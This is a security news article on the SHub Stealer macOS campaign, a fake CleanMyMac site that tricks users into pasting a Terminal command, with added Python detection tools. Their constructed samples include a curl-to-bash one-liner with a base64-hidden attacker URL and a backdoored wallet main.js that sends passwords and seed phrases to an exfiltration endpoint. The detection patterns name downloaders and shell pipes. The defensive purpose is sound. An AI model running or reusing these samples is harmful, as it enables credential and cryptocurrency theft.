A sophisticated phishing campaign is luring Mac users into downloading a potent malware known as SHub Stealer through a fake website masquerading as the popular system optimization tool CleanMyMac. The malicious site, operating at cleanmymacos[.]org, has no affiliation with the legitimate software developer MacPaw. Once installed, SHub Stealer is designed to pilfer a wide range of sensitive data, including saved passwords, browser history, Apple Keychain credentials, and crucially, cryptocurrency wallet files and Telegram session data.
Researchers at Malwarebytes have detailed the attack chain, which sidesteps macOS's built-in defenses rather than breaking them. The campaign uses the technique known as “ClickFix”: the site instructs the user to open the Terminal application and paste a command presented as an installation step. The command first echoes a genuine-looking MacPaw link for credibility, then decodes a base64-encoded string to recover the real download URL (so the destination never appears in the pasted text), and finally fetches a shell script from an attacker-controlled server and pipes it straight into a shell. Because the user runs the command directly, the downloaded script is never marked with the quarantine attribute that a browser download would carry, so Gatekeeper, notarization checks and XProtect's launch-time scan never get a chance to evaluate it.
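The safe way to handle a command like the one described above is to decode it without running it. The following Python triage helper is an added example, not code from Malwarebytes or from the campaign: it pulls base64-looking tokens out of a pasted one-liner, decodes them in-process, and reports whether the command has the ClickFix shape (remote fetch, hidden destination, output piped into a shell). The sample command is constructed to match the description on this page; the encoded URL points at the placeholder host `attacker.example.invalid`, not the campaign's infrastructure.

```python
import base64
import re
import string

# Constructed stand-in for the pasted one-liner described above: it echoes a
# legitimate-looking MacPaw URL, hides the real download URL in base64 and
# pipes the fetched script straight into a shell. HIDDEN_URL is a placeholder.
HIDDEN_URL = "https://attacker.example.invalid/install.sh"
SAMPLE_COMMAND = (
    'echo "https://macpaw.com/cleanmymac" && '
    f'curl -fsSL "$(echo {base64.b64encode(HIDDEN_URL.encode()).decode()} | base64 -d)" | bash'
)
BENIGN_COMMAND = "brew install --cask cleanmymac"

URL_RE = re.compile(r"https?://[^\s\"'<>)]+")
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
DECODER_RE = re.compile(r"base64\s+(?:-d|-D|--decode)|openssl\s+(?:enc|base64)\s+-d|xxd\s+-r")
FETCH_RE = re.compile(r"\b(?:curl|wget|osascript)\b")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")
PRINTABLE = set(string.printable)


def decode_base64_blobs(command):
    """Return (blob, decoded_text) for each base64-looking token that decodes to printable text.

    Nothing is executed: the blob is decoded in-process, which is what the
    victim's shell would have done before handing the result to curl.
    """
    found = []
    for blob in B64_RE.findall(command):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except ValueError:  # bad padding, not base64, or not UTF-8 (binascii/Unicode errors subclass ValueError)
            continue
        if text and all(ch in PRINTABLE for ch in text):
            found.append((blob, text))
    return found


def triage(command):
    """Summarize whether a one-liner has the ClickFix shape: fetch + hidden destination + direct shell execution."""
    blobs = decode_base64_blobs(command)
    report = {
        "visible_urls": URL_RE.findall(command),
        "hidden_urls": [u for _, text in blobs for u in URL_RE.findall(text)],
        "decodes_base64": bool(DECODER_RE.search(command)),
        "fetches_remote": bool(FETCH_RE.search(command)),
        "pipes_to_shell": bool(PIPE_TO_SHELL_RE.search(command)),
    }
    report["clickfix_shaped"] = (
        report["fetches_remote"]
        and report["pipes_to_shell"]
        and (report["decodes_base64"] or bool(report["hidden_urls"]))
    )
    return report


if __name__ == "__main__":
    for cmd in (SAMPLE_COMMAND, BENIGN_COMMAND):
        r = triage(cmd)
        print(f"{cmd!r}\n  visible: {r['visible_urls']}\n  hidden:  {r['hidden_urls']}\n"
              f"  clickfix_shaped: {r['clickfix_shaped']}\n")
```

The check is deliberately conservative: a command that only fetches and pipes to a shell without hiding its destination is still dangerous, but the combination of a decoder and a URL the user never saw is the signature of this particular lure.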
SHub Stealer is identified as part of an escalating family of AppleScript-based macOS information-stealing malware, joining others like MacSync Stealer and Odyssey Stealer. Notably, SHub demonstrates enhanced capabilities beyond its relatives, incorporating per-victim tracking identifiers, geofencing logic, and a disturbing ability to permanently backdoor installed cryptocurrency wallet applications.
How SHub Stealer Backdoors Crypto Wallet Apps
The most alarming aspect of SHub Stealer is its post-exploitation functionality, specifically targeting cryptocurrency wallet applications. If the malware detects specific crypto wallet apps on a compromised system, it proceeds to silently replace the core logic file of each application with a malicious, backdoored version. This replaced file functions identically to the legitimate one, but in the background, it exfiltrates user credentials.
The five confirmed targets of this backdoor are Exodus, Atomic Wallet, Ledger Wallet, Ledger Live, and Trezor Suite. All of them are built on the Electron framework, which packs the application's JavaScript into a single archive, `app.asar`, inside the app bundle; whoever controls that file controls the application's behavior. SHub terminates the running wallet, downloads a modified `app.asar` from its command-and-control server, overwrites the original, strips the now-invalid code signature, and re-signs the bundle so that macOS will still launch it. The re-signed bundle therefore no longer carries the vendor's signing identity, a detail that a check of the bundle's signature (for example `codesign -dvv` on macOS) will reveal.
For Exodus and Atomic Wallet, the backdoored application is configured to silently send the user's password and seed phrase to `wallets-gate[.]io/api/injection` every time the wallet is unlocked. In the case of Ledger Wallet and Ledger Live, TLS validation is disabled at startup, and a fake recovery wizard is presented to the user, which collects the seed phrase before transmitting it to the same endpoint. Trezor Suite instead receives a full-screen overlay designed to mimic its legitimate interface. This overlay presents a fabricated security update that requests the seed phrase, validates it using the application's own BIP39 library, and then sends it to the attacker.
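Because the tampered `app.asar` is re-signed, a plain signature check can pass; what does not change is the content of the archive. The following Python scanner is an added example, not a tool from Malwarebytes or any wallet vendor: it parses the asar container (a Chromium Pickle header followed by a JSON file tree and the packed file bytes) and searches every packed file for the exfiltration endpoint named above plus two generic ways Electron code disables TLS validation. The TLS patterns are a general check for the behavior described on this page, not strings confirmed in the sample; the sample `main.js` files and the `build_asar` packer are constructed here purely to exercise the scanner.

```python
import json
import re
import struct

# Indicators drawn from the behaviour described above. The two TLS patterns are
# generic (a developer build might also set them), so they are triage signals,
# not proof of compromise on their own.
INDICATORS = {
    "exfil-domain": re.compile(rb"wallets-gate\.io"),
    "exfil-endpoint": re.compile(rb"/api/injection"),
    "tls-validation-off": re.compile(rb"rejectUnauthorized[\"']?\s*[:=]\s*false"),
    "tls-env-override": re.compile(rb"NODE_TLS_REJECT_UNAUTHORIZED[\"']?\s*\]?\s*=\s*[\"']?0"),
}


def read_asar_header(data):
    """Parse the asar container header.

    Layout (Chromium Pickle encoding, little-endian uint32 fields):
      [4][header_pickle_size][payload_size][json_len][json, padded to 4 bytes]
    Packed file contents start at offset 8 + header_pickle_size.
    """
    magic, header_size = struct.unpack_from("<II", data, 0)
    if magic != 4:
        raise ValueError("not an asar archive")
    _payload_size, json_len = struct.unpack_from("<II", data, 8)
    header = json.loads(data[16:16 + json_len])
    return header, 8 + header_size


def iter_asar_files(data):
    """Yield (path, bytes) for every file packed inside the archive."""
    header, base = read_asar_header(data)

    def walk(node, prefix):
        for name, entry in node.get("files", {}).items():
            path = f"{prefix}/{name}" if prefix else name
            if "files" in entry:
                yield from walk(entry, path)
            elif "offset" in entry:  # entries marked "unpacked" live beside the archive, not in it
                start = base + int(entry["offset"])
                yield path, data[start:start + entry["size"]]

    yield from walk(header, "")


def scan_asar(data):
    """Return sorted (path, indicator) pairs for every indicator found inside the archive."""
    hits = set()
    for path, content in iter_asar_files(data):
        for name, pattern in INDICATORS.items():
            if pattern.search(content):
                hits.add((path, name))
    return sorted(hits)


def build_asar(files):
    """Pack a flat {path: bytes} mapping into the asar layout; used here only to construct samples."""
    tree, blob = {"files": {}}, b""
    for name, content in files.items():
        tree["files"][name] = {"size": len(content), "offset": str(len(blob))}
        blob += content
    header_json = json.dumps(tree).encode()
    padded = header_json + b"\0" * (-len(header_json) % 4)
    header_pickle = struct.pack("<II", 4 + len(padded), len(header_json)) + padded
    return struct.pack("<II", 4, len(header_pickle)) + header_pickle + blob


# Constructed stand-ins for a wallet's main-process file: a clean one and one
# with the kind of injection described above (credentials posted to the
# exfiltration endpoint whenever the wallet is unlocked, TLS checks disabled).
CLEAN_MAIN_JS = b"""const { app } = require('electron');
app.whenReady().then(() => createWindow());
"""
BACKDOORED_MAIN_JS = CLEAN_MAIN_JS + b"""
process.env['NODE_TLS_REJECT_UNAUTHORIZED'] = '0';
ipcMain.on('wallet-unlocked', (_e, password, seed) => {
  fetch('https://wallets-gate.io/api/injection', { method: 'POST', body: JSON.stringify({ password, seed }) });
});
"""
CLEAN_ASAR = build_asar({"main.js": CLEAN_MAIN_JS, "package.json": b'{"main":"main.js"}'})
BACKDOORED_ASAR = build_asar({"main.js": BACKDOORED_MAIN_JS, "package.json": b'{"main":"main.js"}'})


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:  # e.g. /Applications/Exodus.app/Contents/Resources/app.asar
        with open(sys.argv[1], "rb") as fh:
            print(scan_asar(fh.read()) or "no indicators found")
    else:
        print("clean sample:", scan_asar(CLEAN_ASAR))
        print("backdoored sample:", scan_asar(BACKDOORED_ASAR))
```

A hit is a reason to treat the wallet as compromised; an empty result is not a clean bill of health, since a later build of the implant may use different strings. The stronger check is to compare the installed `app.asar` hash against a fresh download from the vendor and to confirm with `codesign -dvv` that the bundle still carries the vendor's Team ID rather than an ad hoc or unknown signature.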
All five backdoored applications exfiltrate data to the same `wallets-gate[.]io` endpoint, utilizing an identical API key and build ID, which strongly suggests a single operator is behind this campaign. To ensure persistent access, SHub installs a background task named `com.google.keystone.agent.plist` within `~/Library/LaunchAgents/`. This task imitates Google’s Keystone updater and is scheduled to execute remote commands every sixty seconds.
Before the main payload is launched, a loader script performs a check for a Russian-language keyboard layout. If detected, it signals the attacker’s server with a `cis_blocked` event and terminates without proceeding with data theft. This geofencing behavior is a common tactic among threat actors associated with Russian-speaking criminal networks, who often seek to avoid infecting systems in Commonwealth of Independent States countries to mitigate scrutiny from local law enforcement. Machines that pass this check have their IP address, macOS version, and hostname transmitted to the command-and-control server located at `res2erch-sl0ut[.]com`.
In light of these findings, users who may have executed the Terminal command from the `cleanmymacos[.]org` website are strongly advised to act immediately. If the command has not yet been run, simply close the page. If it has, check `~/Library/LaunchAgents/` for `com.google.keystone.agent.plist`. Note that Google's genuine Keystone updater installs a file with exactly that name on Macs running Chrome, so the label alone proves nothing: look at the program path inside the plist. The SHub version launches `GoogleUpdate.app` from `~/Library/Application Support/Google/`, whereas the genuine agent runs from under `~/Library/Google/GoogleSoftwareUpdate/`. Remove the malicious plist and the `GoogleUpdate.app` folder from `~/Library/Application Support/Google/` if present. Anyone who had any of the five targeted wallet applications installed when the command ran should treat their seed phrase as compromised: a seed phrase cannot be changed, so funds must be moved to a new wallet created on a clean device, and the tampered wallet application should be reinstalled from the vendor rather than trusted further. The macOS login password and any credentials stored in Keychain should be changed from a trusted device, and any API keys or SSH keys referenced in shell history files should be revoked and regenerated.
The continued development of macOS information stealers such as SHub shows that Mac users are a deliberate target rather than an afterthought. As this tooling evolves to route around platform defenses, the weakest point remains a user persuaded to paste a command into Terminal: software should be obtained from the vendor's own site or the App Store, and no legitimate installation requires pasting an opaque one-liner into a shell.
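The persistence check above is easy to get wrong by hand because the label collides with a legitimate file. The following Python helper is an added example, not part of the Malwarebytes write-up: it parses each LaunchAgent plist and flags the combination this page describes (a Keystone label whose program lives somewhere other than the real Keystone directory, a `GoogleUpdate.app` under Application Support, and a sixty-second `StartInterval`). The two embedded plists are constructed samples; the genuine one approximates a typical Keystone agent and its exact arguments and interval are illustrative, not taken from this page.

```python
import os
import plistlib
import re

# The genuine Keystone agent runs from under <home or />/Library/Google/GoogleSoftwareUpdate/.
# A plist with the Keystone label whose program lives anywhere else is the signal.
GENUINE_KEYSTONE_DIR = "/Library/Google/GoogleSoftwareUpdate/"
SHUB_PROGRAM_MARKER = "/Library/Application Support/Google/GoogleUpdate.app"
SUSPICIOUS_ARGS = re.compile(r"\b(?:curl|wget|base64|osascript)\b|\b(?:ba|z)?sh\s+-c\b")


def program_path(plist):
    """Return the executable a LaunchAgent runs (Program wins over ProgramArguments[0])."""
    if plist.get("Program"):
        return plist["Program"]
    args = plist.get("ProgramArguments") or []
    return args[0] if args else ""


def assess_launch_agent(plist):
    """Return a list of findings for one parsed LaunchAgent dictionary (empty = nothing flagged)."""
    findings = []
    label = plist.get("Label", "")
    prog = program_path(plist)
    if label.startswith("com.google.keystone") and GENUINE_KEYSTONE_DIR not in prog:
        findings.append("keystone-label-but-foreign-program")
    if SHUB_PROGRAM_MARKER in prog:
        findings.append("shub-googleupdate-app")
    interval = plist.get("StartInterval")
    if isinstance(interval, int) and 0 < interval <= 60:
        findings.append(f"beacon-interval-{interval}s")
    if SUSPICIOUS_ARGS.search(" ".join(plist.get("ProgramArguments") or [])):
        findings.append("shell-or-downloader-in-args")
    return findings


def assess_plist_bytes(data):
    """Parse XML or binary plist bytes and assess them."""
    return assess_launch_agent(plistlib.loads(data))


def scan_launch_agents(directory=os.path.expanduser("~/Library/LaunchAgents")):
    """Map each .plist in the directory to its findings; missing directory yields an empty map."""
    results = {}
    if not os.path.isdir(directory):
        return results
    for name in sorted(os.listdir(directory)):
        if not name.endswith(".plist"):
            continue
        path = os.path.join(directory, name)
        try:
            with open(path, "rb") as fh:
                results[path] = assess_plist_bytes(fh.read())
        except Exception as exc:  # unreadable, malformed or non-plist file
            results[path] = [f"unreadable: {exc}"]
    return results


# Constructed samples. The first mirrors the SHub persistence described above; the
# second approximates a genuine Keystone agent (path and interval are illustrative).
SHUB_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.google.keystone.agent</string>
  <key>ProgramArguments</key><array>
    <string>/Users/victim/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>60</integer>
</dict></plist>
"""
GENUINE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.google.keystone.agent</string>
  <key>ProgramArguments</key><array>
    <string>/Users/victim/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/GoogleSoftwareUpdateAgent.app/Contents/MacOS/GoogleSoftwareUpdateAgent</string>
    <string>-runMode</string><string>ifneeded</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>3523</integer>
</dict></plist>
"""


if __name__ == "__main__":
    print("sample (SHub):   ", assess_plist_bytes(SHUB_PLIST))
    print("sample (genuine):", assess_plist_bytes(GENUINE_PLIST))
    for path, findings in scan_launch_agents().items():
        if findings:
            print(path, findings)
```

When the scan flags the file, unload the agent before deleting it (`launchctl bootout gui/$(id -u) ~/Library/LaunchAgents/com.google.keystone.agent.plist`) so the sixty-second beacon stops immediately, then remove the plist and the `GoogleUpdate.app` folder. Deleting a genuine Keystone plist by mistake is not harmful, since Chrome recreates it, but it does nothing to remove the implant.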

